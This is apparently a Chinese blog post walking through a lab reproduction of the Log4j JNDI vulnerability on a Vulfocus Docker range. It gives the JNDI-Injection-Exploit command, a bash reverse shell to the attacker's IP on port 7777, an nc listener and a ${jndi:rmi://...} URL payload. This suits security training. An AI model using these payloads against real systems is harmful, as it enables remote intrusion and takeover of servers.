apache log4j vulfocus 复现

环境配置

cenos7 搭建docker  拉去vulfocus靶场

        kali 

如果这不长时间卡顿 就是网络的问题 可以尝试终止命令重新下载。同学5g网真的块

docker pull vulfocus/vulfocus:latest

拉取docker环境

docker run -d -p 801:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=192.168.137.11  vulfocus/vulfocus

在网页中打开环境      ⬆  ⬆  ⬆   看到了吗就上面801:80  选择前面那个801 物理机映射地址

 kali内的payload生成语句

如果显示没有java环境
https://codeload.github.com/fangjiuye/jiuye/zip/refs/heads/main 下载它放在kali主目录

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,放base64解码后的代码}|{base64,-d}|{bash,-i}"  -A  192.168.137.131 这里也是攻击地址

 bash -i >& /dev/tcp/192.168.198.131/7777 0>&1    #里面的ip是攻击机的ip地址

 

在打开一个kali 终端 使用nc -lvvp 端口号 进行监听这个7777端口返回来的数据

 

 payload=$%7bjndi:rmi://192.168.198.131:1099/tklp4z%7d 更换成你生成的语句 放在url中的payload后面进行调用

 

 回显  如果不回显并且把 kali生成的jdk都用过后 那就放松一下 回忆一下然后开始骂人吧


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部